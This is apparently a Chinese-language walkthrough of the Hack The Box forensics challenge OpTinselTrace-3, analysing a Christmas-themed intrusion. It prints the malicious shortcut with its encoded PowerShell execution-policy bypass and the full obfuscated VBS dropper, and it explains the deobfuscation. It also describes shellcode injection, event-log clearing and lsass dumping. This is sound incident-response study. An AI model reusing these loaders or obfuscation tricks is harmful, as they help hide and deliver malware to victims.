【Sherlocks圣诞节特辑】htb OpTinselTrace-3 wp

2024-02-29 23:30

本文主要是介绍【Sherlocks圣诞节特辑】htb OpTinselTrace-3 wp,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

TASK 1
What is the name of the file that is likely copied from the shared folder (including the file extension)?
可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?

TASK 2
What is the file name used to trigger the attack (including the file extension)?
用于触发攻击的文件名是什么(包括文件扩展名)?

TASK 3
What is the name of the file executed by click_for_present.lnk (including the file extension)?
click_for_present.lnk执行的文件的名称是什么(包括文件扩展名)?

TASK 4
What is the name of the program used by the vbs script to execute the next stage?
vbs 脚本用于执行下一阶段的程序名称是什么?

TASK 5 暂无

TASK 6
What is the URL that the next stage was downloaded from?
从哪个 URL 下载下一阶段?

TASK 7
What is the IP and port that the executable downloaded the shellcode from (IP:Port)?
可执行文件从中下载 shellcode 的 IP 和端口是什么 (IP:Port)?

TASK 8
What is the process ID of the remote process that the shellcode was injected into?
注入 shellcode 的远程进程的进程 ID 是什么?

TASK 9
After the attacker established a Command & Control connection, what command did they use to clear all event logs?
攻击者建立命令和控制连接后,他们使用什么命令清除所有事件日志?

TASK 10
What is the full path of the folder that was excluded from defender?
从 Defender 中排除的文件夹的完整路径是什么?

TASK 11
What is the original name of the file that was ingressed to the victim?
侵入受害者的文件的原始名称是什么?

TASK 12 暂无


TASK 1
What is the name of the file that is likely copied from the shared folder (including the file extension)?
可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?

这题我蒙的 因为我拖了所有的smb日志都没找到相关的…师傅们有可以找到共享文件夹的方式欢迎留言指教

看到用户桌面路径下有一个zip
是个

TASK 2
What is the file name used to trigger the attack (including the file extension)?
用于触发攻击的文件名是什么(包括文件扩展名)?

这题我弱智了,朋友提醒才想起来dump解压zip
在这里插入图片描述
看文件内容第一个内容是

└─$ cat click_for_present.lnk 
P�O� �:i�+00�/C:\V1Windows@     ��.WindowsZ1System32B   ��.System32▒t1WindowsPowerShellT        ��.WindowsPowerShell N1v1.0:    ��.v1.0l2powershell.exeN    ��.powershell.exeTrick or treatB..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exep-ep bypass -enc JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAI
AAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbg
B0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbAB
lAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABG
AHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA==C:\Windows\Sy
stem32\shell32.dll�%SystemRoot%\System32\shell32.dll%SystemRoot%\System32
\shell32.dll�%��wN�▒�]N�D.��Q����      ��1SPS��XF�L8C���&�m�m.S-1-5-21-3849600975-1564034632-632203374-1001  

TASK 3
What is the name of the file executed by click_for_present.lnk (including the file extension)?
click_for_present.lnk执行的文件的名称是什么(包括文件扩展名)?
在这里插入图片描述

TASK 4
What is the name of the program used by the vbs script to execute the next stage?
vbs 脚本用于执行下一阶段的程序名称是什么?

看一下vbs的内容会发现是简单的混淆

Nonphilosophicalgloriat = LenB("Ritualizing") 
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Private Const Overcrammi = &HFFFFB15F
Private Const Rdkridtet = &HFFFFB96E
Private Const Delarbejdets = -19974
Private Const Sammentraengte = "Atokal Becram Latchkeys"
Private Const Tlleapparaternes = "Tropikfronters Udludningen Uigenkaldeliges122 Gunsels"
Private Const Dispergeringsmidlers = "Homostyled Tiltuskede"
Private Const Indlejrende = -36431
Private Const Iteratively = "Rhyptical Stetoskopers"
Private Const Spadillers = "Decursive consubstantialism"
Private Const Gemenheden136 = "Afstumpningens Elusiveness Encirclements"
Private Const kromosomernes = "fells Fastballs Laron"
Private Const Insures = "Forsvarlige ydernes Approachens"
Private Const Medianens = -11670
Private Const Udviklingspsykologerne = &HDCEC
Private Const Afrustet = "Ceded Prajene Linkages"
Private Const Hyperalgebra228 = &HFFFFB5B0
Private Const Overrapturize = -45841
Private Const Sandormene = 21903
Private Const Ravenhood = "Outwrites Negligibly"
Private Const Zara = -40317
Private Const Landsforeningers = &HFFFF612F
Private Const Spulings = 53917
Private Const Forfjerdinger = &HFFFF1B6F
Private Const Matus = -64522
Private Const omskrendes = &HFFFF2EBE
Private Const Udpolstringerne70 = &HFFFF4034
Private Const Grandmother241 = -15586
Private Const Studeopdrtters = -10206
Private Const Elisas = "Redeployment Leglet"
Private Const Panicking = "Seriously Noisiest"
Private Const Rdhud = 64782
Private Const Rebelly = "Absenteringers Paleodendrologic Stvfrakkernes Suspenderendes"
Private Const Davon = -62249
Private Const Korsfst = &HCEA8
Private Const Busstoppestederne = 52451
Private Const Undladtes = &HFFFFBCBF
Private Const Idiologism = -21819
Private Const Kokoromiko = &HFFFF0BF2
Private Const Skalken = &H8570
Private Const Stribningens = -8436
Private Const Synthesization = "Graags157 Helligtrekongers Lillefingrene"
Private Const Lydbaands = 63620
Private Const Omphalodia = -38461
Private Const Butyrousness = "Witting Blokhaandteringens"
Private Const chirogymnast = "Smsyning blackballed"
Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process")Modulidae = "WScript." & "Shell"Set Firklverne = CreateObject(Modulidae)For Each objProcess in colProcessbb=instr(1,objProcess.Name,"s",vbTextCompare)if bb <> 0 then exit forNextUnrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "Tetrafluoridepr196 = Log(883567)
A4 = A4 + "sproglGRINCHg){"
superassociatepa = Right("Myriacanthous157",38)
A4 = A4 + "RINCHcs thst de"
Fulyiehasteindkaldel = MidB("Recirkulerede", 198, 100)
A4 = A4 + "dwelleGRINCH GR"
Momusesfarvefabr = Momusesfarvefabr & "Organbird" 
A4 = A4 + "spesed thn joyo"
Fyringsgasoliensyttendede = FormatDateTime("12/12/12")
A4 = A4 + "ut celebLatGRIN"
Voguishnesspencillersga = MidB("Nonsacredly", 5, 201)
A4 = A4 + "RINCHn$er holed"
while (Vrdihfteslarsonaandsviden<88)
Vrdihfteslarsonaandsviden = Vrdihfteslarsonaandsviden + 1
Fornyelsesbevgelseh = Fornyelsesbevgelseh * (1+1)
wendUnderkendelseskla = Rnd
A4 = A4 + "bsGRINCHmmGRINC"
Clodknockerfejlretableri = Now
A4 = A4 + "t GRINCHng up$d"
Sparkletmendiecri = Sparkletmendiecri & "Upjerk" & "Sakieh" 
A4 = A4 + ", lnd sGRINCHnu"
Lazarouswonderst = Split("Sanativeness")
A4 = A4 + "ked wGRINCHs lG"
Livsenergienssabbat = Right("Chics",67)
A4 = A4 + "esteve tranGRIN"
Hitchiestlailahsmiljmini = FormatPercent(4686710)
A4 = A4 + "CHtGRINCHonstal"
Fiberrigejordblonderme = "Janie" & "Lovering187" & "Bldersygdommene" 
A4 = A4 + "INCHon dGRINCHo"
Panelersbatturegensk = FormatNumber(812904)
A4 = A4 + "NCHag the towns"
Flyvekkkenernescocamamab = "Nilghais"
Flyvekkkenernescocamamab = Replace(Flyvekkkenernescocamamab,"Humdrumminess","Galilernes")
A4 = A4 + "RINCHpGRINCHt t"
Prosadigtetsundia = Prosadigtetsundia * 3889211 
A4 = A4 + ""
Renkulturenkopip = Split("Feeblebrained")
A4 = A4 + ""
Aflejretgnomologicaludm = Aflejretgnomologicaludm & "outcome" 
A4 = Replace(A4,"GRINCH","i")
Rostellariaholdarb = LCAse("Tevandskngts")
Firklverne.Run Aadselsbilles + Chr(34) + A4 + Chr(34),0

最后执行了Aadselsbilles + Chr(34) + A4 + Chr(34),0
需要关注Aadselsbilles

Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process")Modulidae = "WScript." & "Shell"Set Firklverne = CreateObject(Modulidae)For Each objProcess in colProcessbb=instr(1,objProcess.Name,"s",vbTextCompare)if bb <> 0 then exit forNextUnrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "

colProcess获取当前所有进程或者说Win32_Process的实例类

For Each objProcess in colProcessbb=instr(1,objProcess.Name,"s",vbTextCompare)if bb <> 0 then exit for

colProcess赋给objProcess ,然后变量bb获取当前进程名(objProcess.Name)中’s’字符的位置

Unrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "

mid从index 1开始向后获取objProcess.Name偏移量bb的字符,也就是一个’s’
所以

Aadselsbilles="power" & 's' & "hell "

TASK 5
What is the name of the function used for the powershell script obfuscation?
用于混淆 powershell 脚本的函数名称是什么?

可以看到最后powershell执行的A4部分,A4也做了混淆所以对他进行筛选输出

└─$ grep 'A4' present.vbs 
A4 = A4 + "FunctGRINCHon W"'Hypogee Stvknaps Polarimeters Tritanopic Brunroden
A4 = A4 + "rapPresent ($En"'Mirepoix250 Resoluttes Ansvarligere
A4 = A4 + "sproglGRINCHg){"
A4 = A4 + "$NrGRINCHngsvGR"'Servietters Tvelys Pillernes
A4 = A4 + "INCHrksomhedern"'Skraastribedes Raadighedsbelbet Nitrere Gruppere
A4 = A4 + "es = $EnsproglG"'Nedjustere Rgerrigheder Yellowfish145
A4 = A4 + "RINCHg.Length-1"'Lyssignalet Collegers
A4 = A4 + "; For ($SmGRINC"'Tillidsfuld Zap188
A4 = A4 + "Hths211=6; $SmG"'Tyvagtigt Sanitetsmestre Riverbush Tresche
A4 = A4 + "RINCHths211 -lt"'Krestens Relateret
A4 = A4 + " $NrGRINCHngsvG"'Svampekostenes Afleverede121 Martyrminernes ungkreaturer
A4 = A4 + "RINCHrksomheder"'Supercargoship Festprogrammerne Ratakslens
A4 = A4 + "nes){$MalGRINCH"'Bootjack211 Unsinuate Giacobo Lasters Melancholious
A4 = A4 + "ce=$MalGRINCHce"'unrelentor Ducklar Kalendarium Beundrerindernes
A4 = A4 + "+$EnsproglGRINC"'Postprojekt86 Bygningselementers Blackening Abildhj
A4 = A4 + "Hg.SubstrGRINCH"'Spillway Antarktis Libyske
A4 = A4 + "ng($SmGRINCHths"'Bugtalernes Demissioneret Uflsomme
A4 = A4 + "211, 1);$SmGRIN"'Trimesinic Flyvepladsen
A4 = A4 + "CHths211+=7;}$M"'Diazotize Riffelgang
A4 = A4 + "alGRINCHce;};$p"'Moderselskabernes Yngledygtigere Floorings Plastvarens
A4 = A4 + "resent=WrapPres"'Phthisiology Acetphenetidin Senatorernes ethyl
A4 = A4 + "ent 'Once uhon "'Wilda Diversifiable Attracts teknologs Privatissime
A4 = A4 + "a ttme, GRINCHn"'Blgelinie Museflderne Borgersind171 Udbytningens
A4 = A4 + "tthe whpmsGRINC"'Beauty Hklenaalens Frsningen
A4 = A4 + "Hcal:town o/ Ho"'Sowbug Indvaaneres Anemopsis Musikprogram Vestkysterne
A4 = A4 + "lGRINCHd/y Holl"'Navellike Ileocolic Kultivatoren Redemptive Radiatory
A4 = A4 + "7w, the7e lGRIN"'Firemaster Anfordringskontos Isomorphisms
A4 = A4 + "CHve. two l7gen"'Septiferous Myrs27 Padle Sheaflike
A4 = A4 + "dar4 fGRINCHgur"'Frousy Seksdageslbenes
A4 = A4 + ".s know1 far a9"'Cykelryttere Frankeringens207 Convulsed
A4 = A4 + "d wGRINCHde8 th"'Pedanteriets Underfundighederne
A4 = A4 + "e G.GRINCHnch a"'Bargeman Deflected141
A4 = A4 + "5d Sant2 Claus/"'Terminalknudens16 companator Nattekvarter
A4 = A4 + " They desGRINCH"'Malacopodous Unincantoned
A4 = A4 + "dedeon oppssGRI"'Satisfaktionernes Diagnostisk
A4 = A4 + "NCHte stdes ofr"'Udstykkernes Brndvidderne Aflsningens
A4 = A4 + "the toon, eacy "'Excommunicant Bargaining
A4 = A4 + "wGRINCHth _heGR"'Corinnes Interparlamentarisk Tubaerne Frekvenskomponenternes Rokketands
A4 = A4 + "INCHr ocn unGRI"'Retraversing Philosophicopsychological
A4 = A4 + "NCHqhe charrcte"'Datacenter ruineredes Trapez Rag90
A4 = A4 + "rGRINCHsGRINCHG"'Geometrid177 Bindle
A4 = A4 + "RINCHcs thst de"
A4 = A4 + "fGRINCHted them"'Crinkles traktorens Tvisters Stedtillgget
A4 = A4 + ". The arGRINCHn"'Srinteresseomraadernes Ormegaardenes
A4 = A4 + "ch,sa solGRINCH"'Tiltningens Tyromancy Tandbrstnings
A4 = A4 + "/ary creature,v"'dataerklringerne Langel Rickettsiales Oprullede Strandgrunden
A4 = A4 + "dwelleGRINCH GR"
A4 = A4 + "INCHn a lave at"'Skelter Combusting
A4 = A4 + "_p Mounp Crumpr"'Virussernes Bahrains Uninvestigated
A4 = A4 + "t. WGRINCHte hG"'anoli Pantellerite Associableness
A4 = A4 + "RINCHs gseen fu"'Alloker Bevogtnings Panserglasrude Synnves
A4 = A4 + "e and anheart t"'Ophjningen bortfjernelser Unlighted
A4 = A4 + "eemGRINCHng.y t"'Ruledom Exship Favoriserende
A4 = A4 + "wo jGRINCHzes t"'Kalk Efterlnner Udbldning88
A4 = A4 + "po smalg, he h'"'Bepuddle Overfiske Vekselstrmmenes
A4 = A4 + ";$gluhweGRINCHn"'Reagensglasbarns Printerjob Proctored
A4 = A4 + "=WrapPresent 'd"'Blomsterrige Zamboer Tomahawks136
A4 = A4 + " a peGRINCHchan"'Modstandsgruppes Anglomaner Cyanogenamide Sluddet118
A4 = A4 + "t eor mGRINCHsx"'Dengang Forhandlingsklimas Anagrammatisation Furling Anisodont
A4 = A4 + "hGRINCHef a';. "'Fireaarsdrengen Peins Svejseflammerne Ambitendency haardnakkedes
A4 = A4 + "($gluhweGRINCHn"'Acinetinan Niais
A4 = A4 + ") (WrapPresent "'Statsskattedirektoraternes Udlevede162 Blegnings Polydispersity
A4 = A4 + "'d a dGRINCH$da"'Sulphocarbolic bert Costumiers
A4 = A4 + "GRINCHn fpr any"'Galvanised Stningsbloks Cabirian49 Grnsestationen
A4 = A4 + "teGRINCHng fert"'traject Several116 Traumatiser
A4 = A4 + "GRINCHve. se de"'Slaggers236 Arbejdsstykker Dillseed Ranva226
A4 = A4 + "spesed thn joyo"
A4 = A4 + "ut celebLatGRIN"
A4 = A4 + "CHonsothat echo"'lavmaalet Nabonulpunkters Sapromic kvdernes
A4 = A4 + "ed tarough the "'Buffistens Paychecks stablemen Indremissionsk cryptolunatic
A4 = A4 + "towGRINCH, espe"'Affaldsskakten Aquiparous Brnesikrings
A4 = A4 + "oGRINCHally nur"'Trinlse Spejdende Sangkoret Styrkegrad unsensualise
A4 = A4 + "GRINCHng =he wG"'Regimer Udspar Balkan137
A4 = A4 + "RINCHn$er holed"
A4 = A4 + "ays. nn the vth"'Deerberry Sregn Chebacco Gunfighter
A4 = A4 + "er s:de of tolG"'Blackamoors Unsugared Menstruation41 Cytochylema Opkrvningsgebyret
A4 = A4 + "RINCHdayeHollow"'Immatrikulecr Parafraseret Fratrdelses Othilies Tandteknikers
A4 = A4 + "m nestlpd GRINC"'Foldstool Spongeless Importere144
A4 = A4 + "Hn ac');$FGRINC"'Astronautic oxyderingen Chappies89 energiudladningerne ivars
A4 = A4 + "Hle=WrapPresent"'Speaketeksternes Stenansigternes Totty Superintendential
A4 = A4 + " 'cozy w\rkshop"'Continuingly Vaebnerrang Oarless Kashmirens
A4 = A4 + "pat therNorth e"'Husmandskone Hardwares Kommunalbestyrelser
A4 = A4 + "ole, lsved the "'Sagoens Overarbejderne Alexius75
A4 = A4 + "jollynand betev"'subcutaneous Rekonvalesceret Makroredigeringerne
A4 = A4 + "olen. SantaeCla"'Borggaardene Doggerelism Folkemusiks
A4 = A4 + "us.xWGRINCHth h"'Josephus Anbefalendes Textuality Cosmus Monogynious
A4 = A4 + "es roun';. ($gl"
A4 = A4 + "uhweGRINCHn) (W"'Galileis Jernstberierne Slappelsers pst
A4 = A4 + "rapPresent ' be"'Inanely Dgnkiosk Cementmaker Borden
A4 = A4 + "lly$ rosy pheek"'Jointwood Artificial Hornlike Unidealistically160
A4 = A4 + "s,eand a reart "'Prorektor Oxshoe Outshowed Dataselskabets
A4 = A4 + "bsGRINCHmmGRINC"
A4 = A4 + "HngewGRINCHth k"'Maksimmrr Prodition Nonchronical Paatrngende Antagonisers
A4 = A4 + "nndnesst he spL"'Angakokker136 Rehandles Barramunda
A4 = A4 + "nt hGRINCHsoday"'Admissive Fortifys
A4 = A4 + "s ccaftGRINCHng"'Narcos Lambitive
A4 = A4 + "atoys ftr chGRI"'Handlike Hypnotiserendes
A4 = A4 + "NCHlGRINCHren a"'Krydsmissilet30 Wolfen Clappered Ditetik
A4 = A4 + "round thn world"'Quadrilogy Ansa Deflationens
A4 = A4 + "=and sp$eadGRIN"'Amortization Snoringly
A4 = A4 + "CHngpcheer eher"'Radiologiens Palestra Kondicykels Velegnet skryderens
A4 = A4 + "ever he west. Y"'Cammed Maitressens Brancheanalysen Giolitti
A4 = A4 + "eae afternyear,"'Mensurations57 Elitre103 Ocarina Colymbriformes37 bestver
A4 = A4 + " ts the LolGRIN"'Lemur Rvrendt Folklorister vigepligtige Repacked
A4 = A4 + "CHdayoseasoncap"'Underbelyst Blotchier Swinery
A4 = A4 + "proaahed, tte t"'Perturbedness Snydeblusens Reagenset Trillingefdsel
A4 = A4 + "ownGRINCHfolk e"'Bicepserne Spejderhaglene staalvrksarbejders Heterodoxness
A4 = A4 + "ogerly nrepare+"'snnikens Halvaarlige Loupcerviers
A4 = A4 + " for f$stGRINCH"'Gennemprygling Unisonance
A4 = A4 + "vGRINCHtFes, ad"'Gjalt Autentificeringerne
A4 = A4 + "GRINCHrnGRINCHn"'Orthodoxal Sprightfulness Fagforeningskomiteer220 Teleophyte Oversecured
A4 = A4 + "g lhe streets w"'Devouringly Towelette121 borogove Lavvandstand Londonsk
A4 = A4 + "GRINCHh');. ($g"'Callower Overphilosophize eksport
A4 = A4 + "luhweGRINCHn) ("'Cangle Tripot
A4 = A4 + "WrapPresent 'h "'pulsaarers Rulleskjters
A4 = A4 + "lGRINCHgh.s, se"'Subvariety Sopite67 Nonrecessive
A4 = A4 + "t GRINCHng up$d"
A4 = A4 + "ecoragGRINCHons"'Usundt protectively Trepanation Opfordrings14 Naiades63
A4 = A4 + ", lnd sGRINCHnu"
A4 = A4 + "GRINCHng johful"'Nattetiderne165 Hyttefadenes pupfish Vesicle Vulkaniserendes
A4 = A4 + " tuwes. Whele S"'Makulere oksekdet uvenskabeligt
A4 = A4 + "anGRINCHa busGR"'Vrn Forskelsbehandling Indlaansordningers Overtalelseskunsten
A4 = A4 + "INCHny prep red"'Metabular Propagandists Brnetestamenters Fortovsparkeringernes Revelsbens
A4 = A4 + " hGRINCH( sleGR"'Tjekkene Varmekilden
A4 = A4 + "INCHgN and ceec"'eksplodere Knlendes Elsket
A4 = A4 + "ked wGRINCHs lG"
A4 = A4 + "RINCHs- twGRINC"'Katacrotism Macrodactylous unsustained Haderslev
A4 = A4 + "HceO the GbGRIN"'Parables Strobing Televrks
A4 = A4 + "CHnch sjethed e"'Talekanalerne Pegepinden Historiebogen Majuscules shellmonger
A4 = A4 + "n hGRINCHs cave"'Deklamationsnummerets Pyroglazer Generere Resurrectioner
A4 = A4 + ", GRINCHtrGRINC"'Sulphinate Sjllst
A4 = A4 + "Htate  by thn m"'Vollenge Forebitter Mallorcineren Tiptipoldemdre Misidentified
A4 = A4 + "errGRINCHeent t"'Sakkede Stemmeseddelen Softwareudviklings Spritfabrikantens Skyggeboksningernes
A4 = A4 + "htt fGRINCHll.d"'Woollies Brnefri Pbs
A4 = A4 + " the wGRINCHr. "'Organs Sociolingvistikken Urtekosten Shanker Besrgendes
A4 = A4 + "One fatefbl wGR"'Remoote Labilizations Cumhal Underzealously154
A4 = A4 + "INCHntcr, a plr"'Fejemget materialistisk Dogmatists Bents Heraldiker
A4 = A4 + "tGRINCHculGRINC"'Overspunden Heteroclitica Pamperos Becowards77 Fjases
A4 = A4 + "Hrly GRINCHce c"'Geomorphogeny Embrawn Barber
A4 = A4 + "hGRINCHllnswept"'Sankedes Tkkehalm
A4 = A4 + " through)HolGRI"'twafauld Smelterman Hypotekbanks
A4 = A4 + "NCHda. HolloD, "'Ajstrups takkebnner
A4 = A4 + "causong chaws a"'Lam Afmystificeredes Brnefngsel Kaias
A4 = A4 + "nd nGRINCHsrupt"'Zitherist Tyndstegsfilet Prominently Overnicely Quibus
A4 = A4 + "lng theoholGRIN"'Aabent Flaughts Turbiner Sammentllings21
A4 = A4 + "CHdaa spGRINCHr"'sporstofferne Intervaled Dilly Sinneds
A4 = A4 + "GRINCHd. The Fn"'Gambone Underset Terebridae
A4 = A4 + "owstoGRINCHms g"'Kammesjukkens Bavaria Skider Underkursen Ndendes
A4 = A4 + "rel wGRINCHldee"'Talismanens Mondego Embrave
A4 = A4 + ", and (he tow$s"'Nonstability Skrivesituation
A4 = A4 + "folk ptrugglrd "'Trunnion16 Hyperhedonia salgsudviklings Starutternes
A4 = A4 + "to keep thesr f"'Sygeplejeassistenterne Untraceableness Elodeaceae Costar129 Survivalists249
A4 = A4 + "esteve tranGRIN"
A4 = A4 + "CHtGRINCHonstal"
A4 = A4 + "GRINCHve.,ChGRI"'Windscreen Domineredes Lays Anguineous
A4 = A4 + "NCHldr$n werepd"'Troldende Lisente
A4 = A4 + "GRINCHsappeGRIN"'Kloning Ibidem Subdelegating
A4 = A4 + "CHnted rs the s"'Hydrometeorologist Geometriers
A4 = A4 + "rospece of a no"'Theocrasy Arsenicalism Enkeltradet
A4 = A4 + "yous telebraLGR"'Lues Sinonism Strmhvirvlens
A4 = A4 + "INCHon dGRINCHo"
A4 = A4 + "med. WctnessGRI"'Slknings Lakfarver
A4 = A4 + "NCHag the towns"
A4 = A4 + " dGRINCHstresso"'Coelibat Sprogfrdighedens
A4 = A4 + " Santanknew h) "'Urgeringers Druery Composersatsers30 Verdensmagts Overstaffing
A4 = A4 + "had t; do soe')"'Unweighting Raastofferne
A4 = A4 + ";. ($gluhweGRIN"'Poletters Ddc Skumplaster
A4 = A4 + "CHn) (WrapPrese"'Diopsidae afmagringskures Ttnede55 Javaneres
A4 = A4 + "nt 'ethGRINCHng"'Lokkers Revoltingly Erfaringsvidenskab
A4 = A4 + "Sto restore tha"'Columbier Strithaarets Alexandrianism
A4 = A4 + " holGRINCHdry c"'Vulkanernes Oprrsgruppen Subedited Cutty
A4 = A4 + "heet. WGRINCHth"'Unemendable Destillerapparaters Forelskelses
A4 = A4 + "-a twGRINCHnPle"'Gteskabslignende Dagsordener
A4 = A4 + " GRINCHn rGRINC"'Meteorologies Grafologer Conversional
A4 = A4 + "Hs eyeoand a ce"'Antropologi Krusningens Sliknes34
A4 = A4 + "art fell of sop"'Unhawked Ufattelighed Stubrunner
A4 = A4 + "e, hs decGRINCH"'Foldboat Ishockey Lalle remark Dockise
A4 = A4 + "d d to p$y a vG"'Omsorgscentrenes Unchaffing Redenigrate sortmejses Profounder83
A4 = A4 + "RINCHpGRINCHt t"
A4 = A4 + "o ehe GrGRINCHr"'Thorups Passagerskibets Skitsering Scalt Genetor
A4 = A4 + "ch, hosGRINCHng"'Dactylopore Cologners Unilaterales
A4 = A4 + " toewarm hns he"'Republicanises Perthosite Springbalsaminers
A4 = A4 + "art and bLGRINC"'Azrael Traadningslister
A4 = A4 + "Hng baok the cp"'lstykke Treblet
A4 = A4 + "GRINCHrGRINCHt "'Ostentatious Tunfiskene Otter
A4 = A4 + "af the teason.G"'Organisationslinies Kiasmernes
A4 = A4 + "RINCHGuGRINCHde"'ratio Succinctoria Praedikatomdoebning
A4 = A4 + "doby hGRINCHsnu"'Skansekldningernes Dramme Kommunikationsbehovs
A4 = A4 + "nyGRINCHel;GRIN"'Udvandringens Homopati Specifiability Syslen Hydrophytism
A4 = A4 + "CH');"'Liberaliseringerne Dth Stolpesengens Uforstilt Pollux
A4 = A4 + ""'Sikkerhedsstillelsernes Indfrings Kilders Trolddomsevne
A4 = A4 + ""
A4 = A4 + ""'Arbejderungens Mbelfabrikkerne
A4 = A4 + ""'Tepehuane239 Enmeshes
A4 = A4 + ""
A4 = Replace(A4,"GRINCH","i")

这里用vbs直接打印也ok
不过我选择替换’为#之后打印,就可以看到函数了

Function ****** ($Ensproglig){$Nringsvirksomhedernes = 
$Ensproglig.Length-1; For ($Smiths211=6; $Smiths211 -lt 
$Nringsvirksomhedernes){$Malice=$Malice+$Ensproglig.Substring($Smiths211, 
1);$Smiths211+=7;}$Malice;};$present=WrapPresent #Once uhon a ttme, 
intthe whpmsical:town o/ Holid/y Holl7w, the7e live. two l7gendar4 
figur.s know1 far a9d wide8 the G.inch a5d Sant2 Claus/ They desidedeon 
oppssite stdes ofrthe toon, eacy with _heir ocn uniqhe charrcterisiics 
thst defited them. The arinch,sa soli/ary creature,vdwellei in a lave 
at_p Mounp Crumprt. Wite his gseen fue and anheart teeming.y two jizes 
tpo smalg, he h#;$gluhwein=WrapPresent #d a peichant eor misxhief a#;. 
($gluhwein) (WrapPresent #d a di$dain fpr anyteing fertive. se despesed 
thn joyout celebLationsothat echoed tarough the towi, espeoially nuring 
=he win$er holedkshoppat therNorth eole, lsved the jollynand betevolen. 
SantaeClaus.xWith hes roun#;. ($gluhwein) (WrapPresent # belly$ rosy 
pheeks,eand a reart bsimmingewith knndnesst he spLnt hisodays 
ccaftingatoys ftr chiliren around thn world=and sp$eadingpcheer eherever 
he west. Yeae afternyear, ts the Lolidayoseasoncapproaahed, tte townifolkeogerly nrepare+ for f$stivitFes, adirning lhe streets wih#);. ($gluhwein) (WrapPresent #h ligh.s, set ing up$decoragions, lnd sinuingjohful tuwes. Whele Sania businy prep red hi( sleigN and ceecked wis lis- twiceO the Gbinch sjethed en his cave, itritate  by thn merrieentthtt fill.d the wir. One fatefbl wintcr, a plrticulirly ice chillnswept through)Holida. HolloD, causong chaws and nisruptlng theoholidaa spirid. The Fnowstoims grel wildee, and (he tow$sfolk ptrugglrd to keep thesr festeve tranitionstalive.,Childr$n werepdisappeinted rs the srospece of a noyous telebraLion diomed. Wctnessiag the towns distresso Santanknew h) had t; do soe#);. ($gluhwein) (WrapPresent #ethingSto restore tha holidry cheet. With-a twinPle in ris eyeoand a ceart fell of sope, hs decid d to p$y a vipit to ehe Grirch, hosing toewarm hns heart and bLing baok the cpirit af the teason.iGuidedoby hisnunyiel;i#);

TASK 6
What is the URL that the next stage was downloaded from?
从哪个 URL 下载下一阶段?

对上一个脚本的行为进行监测即可
或者丢shell里跑一下也行

TASK 7
What is the IP and port that the executable downloaded the shellcode from (IP:Port)?
可执行文件从中下载 shellcode 的 IP 和端口是什么 (IP:Port)?

找到一个上一步解密后会得到名字的exe,然后再file中找到dump,re一下会看到地址。

在这里插入图片描述

这里inet_pton() 是用于将字符串形式的 IP 地址转换为网络地址结构,
2 表示存储是 IPv4 地址
paddrbuf.sa_data[2]是指向目标存储位置的指针

下面的paddrbuf.sa_data用于存储地址信息的字段,这里其实就是端口号,后面的htons将其中的由16进制转换成大端的网络字节序。

TASK 8
What is the process ID of the remote process that the shellcode was injected into?
注入 shellcode 的远程进程的进程 ID 是什么?

在这里插入图片描述
在这里插入图片描述
创建了一个系统进程快照,然后从上方开始搞
在这里插入图片描述
这里循环while有个对比,下面有个打开进程,猜测应该是在找进程注入。
看下在这里插入图片描述
的值是svchost.exe进程,从头匹配 所以找个最靠前的并且调用了ntd.lld的
但是有两个其实,所以需要看下有哪个外联在这里插入图片描述

或者朋友提供的思路windows.malfind.Malfind

在这里插入图片描述

TASK 9
After the attacker established a Command & Control connection, what command did they use to clear all event logs?
攻击者建立命令和控制连接后,他们使用什么命令清除所有事件日志?

翻Windows PowerShell.evtx日志

TASK 10
What is the full path of the folder that was excluded from defender?
从 Defender 中排除的文件夹的完整路径是什么?

看Defender Operational.evtx日志

TASK 11
What is the original name of the file that was ingressed to the victim?
侵入受害者的文件的原始名称是什么?

这个题很模糊,没有明确的说出是哪个文件,不过就他的措辞来看有两种可能:
1、文件名在受害者电脑上时被修改过
2、在传入受害者电脑前就修改过

这道题如果之前TASK9时,没翻看每一条Windows PowerShell日志的话基本坐牢了,有看过日志的应该有印象,其中一条power shell将一个看似是用户自己写的.exe带参加载了
在这里插入图片描述
但是很奇怪的他引入了lsass.exe以及微软的准许参,有相同参数及使用方法的工具只有一个。

TASK 12
What is the name of the process targeted by procdump.exe?
******.exe 目标进程的名称是什么

你说呢~
在这里插入图片描述

这篇关于【Sherlocks圣诞节特辑】htb OpTinselTrace-3 wp的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/760452

相关文章

Tranformer分布式特辑

随着大模型的发展,如何进行分布式训练也成了每位开发者必备的技能。 单机训练 CPU OffloadingGradient Checkpointing 正向传播时,不存储当前节点的中间结果,在反向传播时重新计算,从而起到降低显存占用的作用 Low Precision Data TypesMemory Efficient Optimizers 分布式 数据并行(DP)和模型并行(MP) 分布

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看

BUUCTF PWN wp--bjdctf_2020_babystack

